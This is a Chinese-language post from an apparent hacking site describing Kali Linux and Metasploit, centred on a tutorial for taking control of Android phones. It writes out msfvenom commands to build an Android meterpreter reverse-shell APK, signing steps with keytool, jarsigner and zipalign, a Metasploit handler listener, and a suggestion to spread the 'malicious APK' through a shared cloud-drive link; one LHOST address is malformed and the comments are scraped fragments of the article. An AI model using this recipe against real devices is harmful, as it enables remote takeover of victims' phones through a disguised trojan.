右侧
黑客技术
当前位置:网站首页 > 网站入侵 > 正文

kail做安卓渗透工具_kali linux渗透工具

作者:hacker发布时间:2022-08-21分类:网站入侵浏览:225评论:5


导读:导航:1、用哪个软件做渗透测试比较靠谱呢?2、如何使用Metasploit对安卓手机进行控制3、渗透工具包是什么kalilinux,Metasploit是什么?有...

导航:

用哪个软件做渗透测试比较靠谱呢?

kali系统专门为做渗透测试安全的人开发的系统,工具系统里都有

如何使用Metasploit对安卓手机进行控制

文章内容可能具有一定攻击性,本文仅供技术交流,如有非法使用后果自负。

在这次的实验中,我会使用kali linux和安卓模拟器演示如何使用Metasploit框架控制Android设备。

创建负载

我们需要两台虚拟机:Kali Linux和安卓模拟器。

打开vm启动Kali linux。接着打开终端,使用msfvenom制作android利用程序。

Msfvenom是msfpayload和msfencode的组合。它是一个单一的工具。它有标准的命令行选项。 Msfvenom用来制造的有效载荷用来渗透Android模拟器。

一旦打开终端提示符下输入以下命令,使用msfvenom工具来创建有效载荷APK文件。

```

msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1128 LPORT=4444 R /root/Desktop/pentest.apk

```

p 设置要使用的payload

LHOST 设置用来接收反弹连接的主机

LPORT 设置用来接收反弹连接的端口

R 设置文件格式

Location 要保存的文件位置

这个命令执行完之后,你会看到一些错误,但不用担心。现在可以到输出目录查看生成的apk了。

我们已经成功创建了Android格式(APK)文件的有效载荷。现在一般Android的移动设备不允许安装没有适当签名证书的应用程序。 Android设备只安装带有签署文件的APK。

我们可以使用如下工具进行手动签名:

l Keytool (已安装)

l jar signer (已安装)

l zipalign (需要安装)

执行下列命令签名。首先使用密钥工具创建密钥库。

keytool -genkey -v -keystore my-release-key.Keystore -alias alias_name -keyalg RSA -keysize 2048 -validity 10000

`

然后使用JARsigner签名APK

jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore my-release-key.Keystore APPNAME.apk aliasname`

再用JARsigner验证签名

jarsigner -verify -verbose -certs APPNAME.apk

`

Kali没有预装Zipalign,需要先apt-get install zipalign。然后用zipalign来验证apk。

zipalign -v 4 APPNAME.apk NEWAPPNAME.apk

现在我们有了一个带有签名的APK,它可以安装在任何设备上。

使用Metasploit进行测试

接下来启动metasploit的监听器。执行msfconsole打开控制台。

use exploit/multi/handler

Set PAYLOAD android/meterpreter/reverse_tcp

SET LHOST 192.168.152.128

SET LPORT 4444

Exploit

是时候将恶意的APK发送到手机上。我们这里使用一个网盘上传我们的APK,并将下载链接分享出去。

这是我们切换到安卓模拟器。

渗透工具包是什么 kali linux,Metasploit是什么?有学黑?

Kali Linux是基于Debian的Linux发行版,

设计用于数字取证和渗透测试。最先由Offensive Security的Mati

Aharoni和Devon Kearns通过重写BackTrack来完成,BackTrack是他们之前写的用于取证的Linux发行版 。Kali

Linux预装了许多渗透测试软件,包括nmap (端口扫描器)、Wireshark (数据包分析器)、John the Ripper

(密码破解器),以及Aircrack-ng (一应用于对无线局域网进行渗透测试的软件).[2] 用户可通过硬盘、live CD或live

USB运行Kali Linux。Metasploit的Metasploit Framework支持Kali

Linux,Metasploit一套针对远程主机进行开发和执行Exploit代码的工具。

Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。这些功能包括智能开发,密码审计,Web应用程序扫描,社会工程。

标签:kail做安卓渗透工具


已有5位网友发表了看法:

  • 访客

    访客  评论于 2022-08-21 16:11:59  回复

    everse_tcp LHOST=192.168.1128 LPORT=4444 R /root/Desktop/pentest.apk```p 设置要使用的pa

  • 访客

    访客  评论于 2022-08-21 20:29:42  回复

    NAME.apk`Kali没有预装Zipalign,需要先apt-get install zipalign。然后用zipalign来验证apk。zipalign -v 4 APPNAME.apk NEWAPPNAME.apk现在我们有了一个带有签名的APK,

  • 访客

    访客  评论于 2022-08-21 18:34:07  回复

    和渗透测试。最先由Offensive Security的Mati Aharoni和Devon Kearns通过重写BackTrack来完成,BackTrack是他们之前写的用于取证的Linux发行版 。Kali Linux预装了许多渗透测试软件,包括nmap (端口扫描器)、Wireshar

  • 访客

    访客  评论于 2022-08-21 14:21:45  回复

    lerSet PAYLOAD android/meterpreter/reverse_tcpSET LHOST 192.168.152.128SET LPORT 4444Exploit是时候将恶意的APK发送到手

  • 访客

    访客  评论于 2022-08-21 21:08:11  回复

    .apk NEWAPPNAME.apk现在我们有了一个带有签名的APK,它可以安装在任何设备上。使用Metasploit进行测试接下来启动metasploit的监听器。执行msfconsole打开控制台。use exploit/

欢迎 发表评论:

网站入侵排行
最近发表
标签列表